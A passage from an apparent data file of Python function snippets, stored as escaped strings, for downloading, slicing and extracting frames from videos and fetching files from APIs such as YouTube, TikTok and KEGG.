print(all_videos)\n\n for video in all_videos:\n video_file = source + video # Retrieve a video from the OverHeadPress\n cap = cv2.VideoCapture(video_file) # capturing the video from the given path\n dim = (224, 224)\n\n while cap.isOpened():\n frame_id = cap.get(1) # current frame number\n ret, frame = cap.read()\n if not ret:\n break\n\n # We are capturing at 28 frames per second. \n # If we want to capture every 0.2 seconds we will take every 5 frames\n if frame_id % 8 == 0:\n filename =\"frame%d.jpg\" % count\n count+=1\n resized = cv2.resize(frame, dim)\n cv2.imwrite(destination + filename, resized)\n\n cap.release()\n print (\"Finished processing: \" + video + \". Ended at video: \" + str(count))", "def download_all(self):\r\n download_path = os.path.join(self.download_path, self.username)\r\n already_downloaded = []\r\n successful_downloads = []\r\n failed_downloads = []\r\n if not os.path.exists(download_path):\r\n os.makedirs(download_path)\r\n elif not os.path.isdir(download_path):\r\n raise NotADirectoryError(\"Download path is not a directory: \" + download_path)\r\n elif self.skip_downloaded:\r\n for item in os.listdir(download_path):\r\n file_path = str(os.path.join(download_path, item))\r\n if os.path.isfile(file_path):\r\n parsed_file = self._parse_file_name(os.path.basename(file_path))\r\n if parsed_file is not None:\r\n already_downloaded.append(parsed_file[\"id\"])\r\n for index, item in enumerate(self.videos):\r\n # Don't download it if the user has set that option, and the tiktok already exists on the disk\r\n if item[\"id\"] in already_downloaded:\r\n logger.info(\"Already downloaded video with id: \" + item[\"id\"])\r\n continue\r\n file_name = self._format_file_name(item[\"createTime\"], item[\"id\"])\r\n file_path = os.path.join(download_path, file_name)\r\n logger.info(\"Downloading video: \" + file_name + \" (\" + str(index + 1) + \"/\" + str(len(self.videos)) + \")\")\r\n video_url = self._format_video_url(item)\r\n success = self.download_video(file_path, video_url, item[\"createTime\"])\r\n if success:\r\n successful_downloads.append(video_url)\r\n else:\r\n failed_downloads.append(video_url)\r\n sleep_time = random.uniform(self.sleep_min, self.sleep_max)\r\n logger.info(\"Sleeping for: \" + str(sleep_time) + \" seconds\")\r\n sleep(sleep_time)\r\n logger.info(\"Processed all {} videos\".format(self.video_count))\r\n logger.debug(\"Fallback counter: \" + str(self.fallback_counter))\r\n logger.debug(\"YouTube-dl DownloadError counter: \" + str(self.fallback_counter))\r\n logger.debug(\"Other error counter: \" + str(self.other_error_counter))\r\n return {\"successful_downloads\": successful_downloads,\r\n \"failed_downloads\": failed_downloads,\r\n \"skipped_downloads\": already_downloaded}", "def stitch_video_temporal(intervals, out_path,\n align_args={'align_mode': None},\n dilation_args={'dilation': None}, \n speed=None,\n im_size=(640, 480)):\n # parse args\n align_mode = align_args['align_mode']\n if not align_mode is None:\n out_duration = align_args['out_duration']\n if align_mode == 'phrase':\n segments = align_args['segments']\n dilation = dilation_args['dilation']\n if not dilation is None:\n person_intrvlcol = dilation_args['person_intrvlcol']\n \n intervals = intervals.copy()\n def download_video_clip(interval):\n video_id, sfid, efid, duration = interval\n video = Video.objects.filter(id=video_id)[0]\n start, end = 1. * sfid / video.fps, 1. * efid / video.fps\n video_path = video.download(segment=(start, end))\n if align_mode == 'phrase' and duration != 0:\n video_path = speed_change(video_path, speed=(end-start) / duration)\n return video_path\n \n # deal with phrase duration\n if not align_mode is None:\n in_duration = sum([i[-1] for i in intervals])\n if align_mode == 'phrase':\n num_syllables = [count_syllables(phrase) for phrase in segments]\n duration_per_syl = 1. * out_duration / sum(num_syllables)\n for idx, i in enumerate(intervals):\n intervals[idx] = (i[0], i[1], i[2], num_syllables[idx] * duration_per_syl)\n # download clips for each phrase \n clip_paths = par_for(download_video_clip, intervals)\n \n # add silent clip for break \n if not dilation is None and dilation < 0.1:\n dilation = None\n if not dilation is None:\n if dilation > 1:\n break_path = create_silent_clip(person_intrvlcol, dilation)\n else: \n video_id, sfid, efid = intervals[-1][:3]\n video = Video.objects.filter(id=video_id)[0]\n interval = (video_id, efid, efid + int(dilation*video.fps), 0)\n break_path = download_video_clip(interval)\n break_path = mute_video(break_path)\n \n # concat phrase clips\n if len(intervals) > 1:\n lyric_path = concat_videos(clip_paths, im_size=im_size)\n else:\n lyric_path = clip_paths[0]\n \n # global change lyric speed \n if align_mode == 'sentence' or not speed is None: \n if speed is None:\n speed = in_duration / out_duration\n# print(in_duration, out_duration, speed)\n lyric_path = speed_change(lyric_path, speed)\n \n # concat the dilation clip\n if not dilation is None:\n concat_videos([lyric_path, break_path], out_path, im_size=im_size)\n else:\n shutil.move(lyric_path, out_path)", "def download_all(conn, logger):\n # setup slices, 24 in total\n slices = [f'year{x}month{y}' for x in [2, 1] for y in range(12, 0, -1)]\n for slice in slices:\n download_intraday_extended(conn, logger, slice)", "def download(urls, dest_folder):\n pass", "def segment_intervals(filename, basedir, start_sec=0, end_sec=0, seconds_between_frame_grabs=10):\n # Get video id\n video_id = re.findall('v\\d+', filename)[0]\n\n # Open file handle\n vid = imageio.get_reader(filename, 'ffmpeg')\n\n # Get metadata\n meta = vid.get_meta_data()\n fps = int(meta['fps'])\n nframes = meta['nframes']\n frames_to_get = np.arange(start_sec, end_sec, seconds_between_frame_grabs) * fps\n\n # Check frames\n for i in frames_to_get:\n try:\n img = vid.get_data(i)\n except:\n raise\n\n # Downlsample full image\n downsampled = downsample_image(img)\n\n # Player status\n h, w, c = img.shape\n factor = 0.23\n y1 = int(h * 0.04)\n x1 = int(w * (0.5 - factor))\n y2 = int(h * 0.0645)\n x2 = int(w * (0.5 + factor))\n pl_status = crop_rect(img, x1, y1, x2, y2)\n\n # Block out center of player status\n h, w, c = pl_status.shape\n factor = .12\n x1 = int(w * (0.5 - factor))\n x2 = int(w * (0.5 + factor))\n pl_status = blackout_middle(pl_status, x1, x2)\n\n # Write full frame and header frame\n imageio.imwrite(os.path.join(basedir, 'full_{}_s{}.png'.format(video_id, int(i/fps))), img)\n imageio.imwrite(os.path.join(basedir, 'pl_status_{}_s{}.png'.format(video_id, int(i/fps))), pl_status)\n imageio.imwrite(os.path.join(basedir, 'downsampled_{}_s{}.png'.format(video_id, int(i/fps))), downsampled)\n\n vid.close()\n\n return True", "def test_video(video_path):\n def get_clips(frames_list, sequence_size=11):\n clips = []\n clip = []\n cnt = 0\n sz = len(frames_list)\n for i in range(0, sz-sequence_size):\n for idx in range(i, i+sequence_size):\n clip.append(frames_list[idx])\n clips.append(clip)\n clip = []\n return clips\n \n all_frames = []\n # loop over all the images in the folder (0.png,1.png,..,199.png)\n dir_path = listdir(video_path)\n dir_path = sorted(dir_path, key=lambda name: int(name[0:-4]))\n for i in dir_path:\n if str(join(video_path, i))[-3:] == \"png\":\n img_path = join(video_path, i)\n all_frames.append(img_path)\n clips = get_clips(frames_list=all_frames, sequence_size=11)\n# clips = get_clips_by_stride(stride=1, frames_list=all_frames, sequence_size=11)\n return clips", "def downloader(urls, path):\n counter = 1\n for media_file in urls:\n # Create the file name\n file_name = \"meme\" + str(counter) + \".jpg\"\n file_location = path + \"/\" + file_name\n print(f\"Downloading {media_file} as {file_name}.\")\n # Overwrite files\n if os.path.exists(file_location):\n os.remove(file_location)\n print(f\"{file_name} will overwrite an existing file of the same name.\")\n wget.download(media_file, out=file_location)\n print(\"\\n\")\n counter += 1\n print(f\"{counter - 1} items were downloaded.\")\n return counter - 1", "def download_list(urls, outdir=None, workdir=None, threads=3):\n pool = ThreadPool(threads)\n download_lambda = lambda x: download(x, outfile=outdir, workdir=workdir)\n pool.map(download_lambda, urls)", "def play_video(path):\r\n #logger.info(\"######: {}, log: {}########\".format('rk8', path))\r\n #original=https://api.hotstar.com/h/v1/play?contentId=1000238814\r\n #path=\"https://api.hotstar.com/h/v2/play/in/contents/1000238814\"\r\n # Create a playable item with a path to play.\r\n data = make_request(path)\r\n #logger.info(\"######: {}, log: {}########\".format('rk3', path))\r\n if not data:\r\n return\r\n\r\n def get_subtitle(url):\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 265b9dab22d4e9a033e6df6f89639f17/master.m3u8?hdnea=st=1560107863~exp=1560111463~acl=\r\n # /*~hmac=2f6fb393159ed5fa1b12bbf12e954eb377cfa0fc852d4ff5eb24446233237620\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 5d0f83c3ccbf4501cf952bdfc8c0d785/subtitle/lang_en/sub-0.vtt\r\n #\r\n _url = urlparse(url)\r\n values = _url._asdict()\r\n values['query'] = ''\r\n values['path'] = '{}/subtitle/lang_en/sub-0.vtt'.format(\"/\".join(values['path'].split('/')[:-1]))\r\n\r\n subtitle_url = ParseResult(**values).geturl()\r\n # subtitle_file = kodiutils.download_url_content_to_temp(subtitle_url, '{}-{}.srt'.format(\r\n # Zee5Plugin.safe_string(item['title']),\r\n # subtitle_lang,\r\n # ))\r\n\r\n return subtitle_url\r\n\r\n #logger.info(\"######: {}, log: {}########\".format('rk6', data))\r\n #item = data['body']['results']['item']\r\n item=data['body']['results']['playBackSets'][0]\r\n path = item['playbackUrl']\r\n licenseURL = item.get('licenseUrl')\r\n subtitle = get_subtitle(path)\r\n\r\n logger.info('Playing video URL: {}, licenseURL: {}, subtitle: {}'.format(path, licenseURL, subtitle))\r\n\r\n play_item = xbmcgui.ListItem(path=path)\r\n if licenseURL:\r\n play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')\r\n play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')\r\n play_item.setMimeType('application/dash+xml')\r\n play_item.setContentLookup(False)\r\n\r\n play_item.setSubtitles([get_subtitle(path)])\r\n\r\n # Pass the item to the Kodi player.\r\n xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)", "def api_get_videos_duration(list_videos, api_service):\n if list_videos:\n durations = []\n dates = []\n\n if isinstance(list_videos[0], tuple):\n chunks50 = divide_chunks([video[0] for video in list_videos], 50)\n\n else:\n chunks50 = divide_chunks([video for video in list_videos], 50)\n\n # print(chunks50)\n\n for chunk in chunks50:\n request = api_service.videos().list(id=\",\".join(chunk),\n part=['contentDetails', 'snippet'],\n maxResults=50).execute()\n\n # print(request)\n\n durations += [parse_duration(element[\"contentDetails\"][\"duration\"]) for element in request[\"items\"]]\n dates += [element[\"snippet\"][\"publishedAt\"] for element in request[\"items\"]]\n\n # print(len(list_videos), len(durations), len(dates))\n\n id_and_duration = sorted([(video_id, durations[idx], datetime.strptime(dates[idx], \"%Y-%m-%dT%H:%M:%S%z\"))\n for idx, video_id in enumerate(list_videos)], key=lambda tup: tup[2])\n\n return id_and_duration\n\n return []", "def video_slicer(filepath, save_path, start_indexes, end_indexes):\n cap = cv2.VideoCapture(filepath)\n\n frame_width = int(cap.get(3))\n frame_height = int(cap.get(4))\n out = cv2.VideoWriter(save_path,cv2.VideoWriter_fourcc('M','J','P','G'), 30, (frame_width, frame_height))\n\n if len(start_indexes) != len(end_indexes):\n return(\"Time stamps must be the same length\")\n\n basket_counter = 0\n frame_counter = 0\n while True:\n ret, frame = cap.read()\n if not ret:\n # if no more frames then break\n break\n\n if basket_counter >= len(end_indexes):\n # if we've gotten all our slices then break\n break\n\n if frame_counter >= start_indexes[basket_counter] and frame_counter <= end_indexes[basket_counter]:\n # if we are in a basket then save that frame\n out.write(frame)\n elif frame_counter > end_indexes[basket_counter]:\n # if we just left a basket then increment our bascket counter\n basket_counter += 1\n\n frame_counter += 1\n\n\n cap.release()\n out.release()\n print(\"{} clips were sliced\".format(str(basket_counter)))\n print(\"File Saved to {}\".format(save_path))", "def videoFrames(filename, framerate=1):\n vid_file = os.path.join(os.path.dirname(os.getcwd()), \"Database\", \"Video\", filename)\n print(vid_file)\n assert os.path.isfile(vid_file), \"Given path is not a valid file\"\n tmpdir = os.path.join(os.getcwd(), \"tmp\")\n subprocess.run(\n [\n \"ffmpeg\",\n \"-i\",\n vid_file,\n \"-r\",\n f\"{framerate}\",\n os.path.join(tmpdir, \"img_%04d.jpg\"),\n ]\n )\n return [os.path.join(tmpdir, i) for i in os.listdir(tmpdir) if not i.endswith(\".wav\")]", "def kegg_download_manager_synchronous(list_of_ids, wait=1):\n urls = ['http://rest.kegg.jp/get/%s' % '+'.join(chunk) for chunk in chunks(list(list_of_ids), 10)]\n num_urls = len(urls)\n print(f\"Total urls to download: {num_urls}. Progress will be shown below.\")\n results = []\n for url in tqdm(urls):\n results.append(download_synchronous(url))\n time.sleep(wait)\n\n return [raw_record for raw_records in results for raw_record in raw_records.split('///')[:-1]]", "def download(server):\n for i in range(10):\n start_time = time.time()\n logging.debug('Start downloading: %d' % i)\n os.system(\"scp %s:18DOWNLOAD downloads/\" % server)\n end_time = time.time()\n logging.debug('End downloading...')\n logging.debug('Time taken by downloader: %s' % (end_time - start_time))", "def fetch_videos():\n channels = get_channels_from_file()\n\n channels_request = service.channels().list(\n part='id, contentDetails',\n forUsername=channels[0]['channelUsername'] # first channel for now\n )\n\n video_list = []\n\n channels_response = channels_request.execute()\n for channel in channels_response['items']:\n uploads_list_id = channel['contentDetails']['relatedPlaylists']['uploads']\n\n next_page_token = ''\n while next_page_token is not None:\n playlistitems_response = service.playlistItems().list(\n playlistId=uploads_list_id,\n part='snippet',\n maxResults=50,\n pageToken=next_page_token\n ).execute()\n\n for playlist_item in playlistitems_response['items']:\n title = playlist_item['snippet']['title']\n video_id = playlist_item['snippet']['resourceId']['videoId']\n print(f'{title}, {video_id}')\n video_list.append({'title': title, 'video_id': video_id})\n\n next_page_token = playlistitems_response.get('nextPageToken')\n\n return video_list", "def download_files(service, file_list, out_path):\n total = len(file_list)\n for i, file_id in enumerate(file_list, 1):\n name = get_file(service, file_id)['title']\n print('Downloading {}... ({}/{}) [{}%]'.format(name, i, total,\n round(i / total * 100)))\n path = os.path.join(out_path, name)\n try:\n download_file(service, file_id, path)\n except errors.HttpError as error:\n os.remove(path) # Remove broken file\n print('Could not download file: {}'.format(error), file=sys.stderr)", "def download_files(self):", "def download_urls(urls_filename, reverse=True, log_filename='youtube-playlist-download.log'):\n urls_file = open(urls_filename)\n url_lines = urls_file.read().splitlines();\n urls_file.close()\n if reverse:\n url_lines = reversed(url_lines)\n\n logfile = open(log_filename, 'w')\n logfile.write('\\n' + str(datetime.now()) + '\\n')\n logfile.flush()\n\n # use -f best to avoid merging and just get the best overall format (saves time)\n youtube_cmd_with_args = ['youtube-dl', '--ignore-errors', '--ignore-config', '--write-info-json', '--no-mtime', '-f best', '-o ' + get_full_filename()]\n\n try:\n for line in url_lines:\n url_id, title = line.split('\\t')[:2]\n print('Downloading video: \"' + title + '\" with id \"' + url_id + '\"')\n run(youtube_cmd_with_args + [YT_PREFIX + url_id])\n print('Done downloading url:', url_id)\n notify('Done downloading url:' + url_id)\n logfile.write('Downloaded\\t' + url_id + '\\t' + title + '\\n')\n logfile.flush()\n except KeyboardInterrupt as e:\n print(\"Exiting\")\n logfile.close()\n\n logfile.close()", "async def download_video(v_url):\n reply = await v_url.get_reply_message()\n if v_url.pattern_match.group(2) != \"\":\n url = v_url.pattern_match.group(2)\n elif reply is not None:\n url = reply.message\n url = re.findall(r\"\\bhttps?://.*\\.\\S+\", reply.message)[0]\n else:\n return\n type = (\n v_url.pattern_match.group(1).lower()\n if v_url.pattern_match.group(1) is not None\n else \"a\"\n )\n await v_url.edit(\"`Preparing to download...`\")\n out_folder = Config.TMP_DOWNLOAD_DIRECTORY + \"youtubedl/\"\n Config.TMP_DOWNLOAD_DIRECTORY + \"/thumb_image.jpg\"\n if not os.path.isdir(out_folder):\n os.makedirs(out_folder)\n if type == \"a\":\n opts = {\n \"format\": \"bestaudio\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"key\": \"FFmpegMetadata\",\n \"writethumbnail\": True,\n \"embedthumbnail\": True,\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\n \"key\": \"FFmpegExtractAudio\",\n \"preferredcodec\": \"mp3\",\n \"preferredquality\": \"320\",\n }\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"quiet\": True,\n \"logtostderr\": False,\n }\n video = False\n song = True\n\n elif type == \"v\":\n opts = {\n \"format\": \"best\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"getthumbnail\": True,\n \"embedthumbnail\": True,\n \"xattrs\": True,\n \"writethumbnail\": True,\n \"key\": \"FFmpegMetadata\",\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\"key\": \"FFmpegVideoConvertor\", \"preferedformat\": \"mp4\"},\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"logtostderr\": False,\n \"quiet\": True,\n }\n song = False\n video = True\n\n try:\n await v_url.edit(\"`Fetching playlist data, please wait..`\")\n with YoutubeDL(opts) as ytdl:\n ytdl.extract_info(url)\n # print(ytdl_data['thumbnail'])\n filename = sorted(get_lst_of_files(out_folder, []))\n except DownloadError as DE:\n await v_url.edit(f\"`{str(DE)}`\")\n return\n except ContentTooShortError:\n await v_url.edit(\"`The download content was too short.`\")\n return\n except GeoRestrictedError:\n await v_url.edit(\n \"`Video is not available from your geographic location due to geographic restrictions imposed by a website.`\"\n )\n return\n except MaxDownloadsReached:\n await v_url.edit(\"`Max-downloads limit has been reached.`\")\n return\n except PostProcessingError:\n await v_url.edit(\"`There was an error during post processing.`\")\n return\n except UnavailableVideoError:\n await v_url.edit(\"`Media is not available in the requested format.`\")\n return\n except XAttrMetadataError as XAME:\n await v_url.edit(f\"`{XAME.code}: {XAME.msg}\\n{XAME.reason}`\")\n return\n except ExtractorError:\n await v_url.edit(\"`There was an error during info extraction.`\")\n return\n except Exception as e:\n await v_url.edit(f\"{str(type(e)): {str(e)}}\")\n return\n c_time = time.time()\n await v_url.edit(\"`YouTube Playlist Downloading Processing Now.\\nPlease Wait!`\")\n if song:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = True\n supports_streaming = False\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 180\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n try:\n ytdl_data_name_audio = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_audio[: (len(ytdl_data_name_audio) - 4)]\n + \".jpg\"\n )\n print(ytdl_data_name_audio)\n file_path = single_file\n song_size = file_size(file_path)\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_audio}`\"\n + \"\\n\"\n + f\"Size👉 {song_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n allow_cache=False,\n thumb=thumb,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_audio}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)\n if video:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = False\n supports_streaming = True\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 0\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n # print(ytdl_data)\n # for file in os.listdir(\"./DOWNLOADS/youtubedl/\"):\n # if file.endswith(\".jpg\"):\n # thumb = \"./DOWNLOADS/youtubedl/\" + file\n # print(os.path.join(\"./DOWNLOADS/youtubedl/\", file))\n # image_link = ytdl_data['thumbnail']\n # downloaded_image = wget.download(image_link,out_folder)\n # thumb = ytdl_data_name_video + \".jpg\"\n file_path = single_file\n video_size = file_size(file_path)\n try:\n ytdl_data_name_video = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_video[: (len(ytdl_data_name_video) - 4)]\n + \".jpg\"\n )\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_video}`\"\n + \"\\n\"\n + f\"Size👉 {video_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n thumb=thumb,\n allow_cache=False,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_video}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)", "def download(dltype, num):\n # This function needs refactoring!\n # pylint: disable=R0912\n # pylint: disable=R0914\n if g.browse_mode == \"ytpl\" and dltype in (\"da\", \"dv\"):\n plid = g.ytpls[int(num) - 1][\"link\"]\n down_plist(dltype, plid)\n return\n\n elif g.browse_mode == \"ytpl\":\n g.message = \"Use da or dv to specify audio / video playlist download\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n elif g.browse_mode != \"normal\":\n g.message = \"Download must refer to a specific video item\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n writestatus(\"Fetching video info...\")\n song = (g.model.songs[int(num) - 1])\n best = dltype.startswith(\"dv\") or dltype.startswith(\"da\")\n\n if not best:\n\n try:\n # user prompt for download stream\n url, ext, url_au, ext_au = prompt_dl(song)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download aborted!\" + c.w\n g.content = generate_songlist_display()\n return\n\n if not url or ext_au == \"abort\":\n # abort on invalid stream selection\n g.content = generate_songlist_display()\n g.message = \"%sNo download selected / invalid input%s\" % (c.y, c.w)\n return\n\n else:\n # download user selected stream(s)\n filename = _make_fname(song, ext)\n args = (song, filename, url)\n\n if url_au and ext_au:\n # downloading video and audio stream for muxing\n audio = False\n filename_au = _make_fname(song, ext_au)\n args_au = (song, filename_au, url_au)\n\n else:\n audio = ext in (\"m4a\", \"ogg\")\n\n kwargs = dict(audio=audio)\n\n elif best:\n # set updownload without prompt\n url_au = None\n av = \"audio\" if dltype.startswith(\"da\") else \"video\"\n audio = av == \"audio\"\n filename = _make_fname(song, None, av=av)\n args = (song, filename)\n kwargs = dict(url=None, audio=audio)\n\n try:\n # perform download(s)\n dl_filenames = [args[1]]\n f = _download(*args, **kwargs)\n if f:\n g.message = \"Saved to \" + c.g + f + c.w\n\n if url_au:\n dl_filenames += [args_au[1]]\n _download(*args_au, allow_transcode=False, **kwargs)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download halted!\" + c.w\n\n try:\n for downloaded in dl_filenames:\n os.remove(downloaded)\n\n except IOError:\n pass\n\n if url_au:\n # multiplex\n mux_cmd = \"APP -i VIDEO -i AUDIO -c copy OUTPUT\".split()\n mux_cmd = \"%s -i %s -i %s -c copy %s\"\n mux_cmd = [g.muxapp, \"-i\", args[1], \"-i\", args_au[1], \"-c\",\n \"copy\", args[1][:-3] + \"mp4\"]\n\n try:\n subprocess.call(mux_cmd)\n g.message = \"Saved to :\" + c.g + mux_cmd[7] + c.w\n os.remove(args[1])\n os.remove(args_au[1])\n\n except KeyboardInterrupt:\n g.message = \"Audio/Video multiplex aborted!\"\n\n g.content = generate_songlist_display()", "def download_video(video_stream):\n global file_size\n file_size = size_in_mb(video_stream.filesize)\n home_dir = os.environ['HOME']\n path = f'{home_dir}/Downloads/Video'\n print('-'*60)\n print(f'Filename:\\t{video_stream.title}')\n print(f'Location:\\t{path}')\n print(f'Size:\\t\\t{file_size} MB\\n')\n\n filename = video_stream.title + '_video.mp4'\n filename = filename.replace('/', ' ')\n filename = filename.replace('\\\\', ' ')\n\n if os.path.exists(os.path.join(path, filename)):\n print(\"The file has been already downloaded.\")\n sys.exit()\n \n video_stream.download(path, filename)", "def test_plenty_of_video_files():\n # make sure that there is one sequence per video file\n pipe = VideoPipe(\n batch_size=BATCH_SIZE, data=PLENTY_VIDEO_FILES, step=1000000, sequence_length=1)\n pipe.build()\n iters = math.ceil(len(os.listdir(PLENTY_VIDEO_DIRECTORY)) / BATCH_SIZE)\n for i in range(iters):\n print(\"Iter \" + str(i))\n pipe.run()", "def get_videos(channel_name, CLIENT_SECRETS_FILE):\r\n\r\n video_list = []\r\n\r\n MISSING_CLIENT_SECRETS_MESSAGE = \"WARNING: Please configure OAuth 2.0\"\r\n\r\n YOUTUBE_READONLY_SCOPE = \"https://www.googleapis.com/auth/youtube.readonly\"\r\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\r\n YOUTUBE_API_VERSION = \"v3\"\r\n\r\n flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,\r\n message=MISSING_CLIENT_SECRETS_MESSAGE,\r\n scope=YOUTUBE_READONLY_SCOPE)\r\n\r\n storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\r\n credentials = storage.get()\r\n\r\n if credentials is None or credentials.invalid:\r\n flags = argparser.parse_args()\r\n credentials = run_flow(flow, storage, flags)\r\n\r\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\r\n http=credentials.authorize(httplib2.Http()))\r\n\r\n # Retrieve the contentDetails part of the channel resource for the\r\n # authenticated user's channel.\r\n channels_response = youtube.channels().list(\r\n forUsername=channel_name,\r\n part=\"contentDetails\"\r\n ).execute()\r\n\r\n for channel in channels_response[\"items\"]:\r\n # From the API response, extract the playlist ID that identifies the list\r\n # of videos uploaded to the authenticated user's channel.\r\n uploads_list_id = channel[\"contentDetails\"][\"relatedPlaylists\"][\"uploads\"]\r\n\r\n # Retrieve the list of videos uploaded to the authenticated user's channel.\r\n playlistitems_list_request = youtube.playlistItems().list(\r\n playlistId=uploads_list_id,\r\n part=\"snippet\",\r\n maxResults=50\r\n )\r\n\r\n while playlistitems_list_request:\r\n playlistitems_list_response = playlistitems_list_request.execute()\r\n\r\n # Print information about each video.\r\n for playlist_item in playlistitems_list_response[\"items\"]:\r\n title = playlist_item[\"snippet\"][\"title\"]\r\n video_id = playlist_item[\"snippet\"][\"resourceId\"][\"videoId\"]\r\n video_list.append((title, video_id, 'https://img.youtube.com/vi/' + video_id + '/0.jpg'))\r\n\r\n playlistitems_list_request = youtube.playlistItems().list_next(\r\n playlistitems_list_request, playlistitems_list_response)\r\n\r\n return(video_list)", "def downloadFilesForDate(googleServices, settings, outputDir, hpwrenSource, gapMinutes, verboseLogs):\n startTimeDT = hpwrenSource['startTimeDT']\n endTimeDT = hpwrenSource['endTimeDT']\n dateDirName = '{year}{month:02d}{date:02d}'.format(year=startTimeDT.year, month=startTimeDT.month, date=startTimeDT.day)\n hpwrenSource['dateDirName'] = dateDirName\n urlPartsDate = hpwrenSource['urlParts'][:] # copy URL\n urlPartsDate.append(dateDirName)\n hpwrenSource['urlPartsDate'] = urlPartsDate\n\n timeGapDelta = datetime.timedelta(seconds = 60*gapMinutes)\n imgTimes = None\n lastQNum = 0 # 0 never matches because Q numbers start with 1\n curTimeDT = startTimeDT\n downloaded_files = []\n prevTime = None\n while curTimeDT <= endTimeDT:\n qNum = 1 + int(curTimeDT.hour/3)\n urlPartsQ = urlPartsDate[:] # copy URL\n urlPartsQ.append('Q' + str(qNum))\n if qNum != lastQNum:\n # List times of files in Q dir and cache\n useHttp = True\n imgTimes = listTimesinQ(urlPartsQ, verboseLogs)\n if not imgTimes:\n if verboseLogs:\n logging.error('No images in Q dir %s', '/'.join(urlPartsQ))\n mp4Url = getMp4Url(urlPartsDate, qNum, verboseLogs)\n if not mp4Url:\n return downloaded_files\n if outputDir != outputDirCheckOnly:\n imgTimes = getGCSMp4(googleServices, settings, hpwrenSource, qNum)\n useHttp = False\n # logging.warning('imgTimes %d %s', len(imgTimes), imgTimes)\n lastQNum = qNum\n\n if outputDir == outputDirCheckOnly:\n downloaded_files.append(outputDirCheckOnly)\n else:\n desiredTime = int(curTimeDT.timestamp())\n closestEntry = min(imgTimes, key=lambda x: abs(x['time']-desiredTime))\n closestTime = closestEntry['time']\n downloaded = None\n if closestTime != prevTime: # skip if closest timestamp is still same as previous iteration\n prevTime = closestTime\n if useHttp:\n downloaded = downloadHttpFileAtTime(outputDir, urlPartsQ, hpwrenSource['cameraID'], closestTime, verboseLogs)\n else:\n downloaded = downloadGCSFileAtTime(outputDir, closestEntry)\n if downloaded and verboseLogs:\n logging.warning('Successful download for time %s', str(datetime.datetime.fromtimestamp(closestTime)))\n if downloaded:\n downloaded_files.append(downloaded)\n\n curTimeDT += timeGapDelta\n return downloaded_files", "def download(urls: List[str], num_threads: int = 40) -> List[str]:\n\n num_files = len(urls)\n start = perf_counter()\n\n print(\"Starting download of %s files . . .\" % num_files)\n\n results = multiprocess(urls, Downloader, num_threads=num_threads)\n\n dur = perf_counter() - start\n print(\"Completed download of %s files after %.3f seconds.\" % (num_files, dur))\n\n return results", "def download_file():\n for lines in urls:\n try:\n req.urlretrieve(lines, '{0}/{1}'.format(folder_path, lines.split('/')[-1]))\n time.sleep(1)\n print ('File - {} - downloaded successfully'.format(lines.split('/')[-1]))\n except urllib.error.HTTPError:\n print('File is missing or not reachable')\n print('Download Complete & Successful!')", "def download_files(valid_links: list) -> 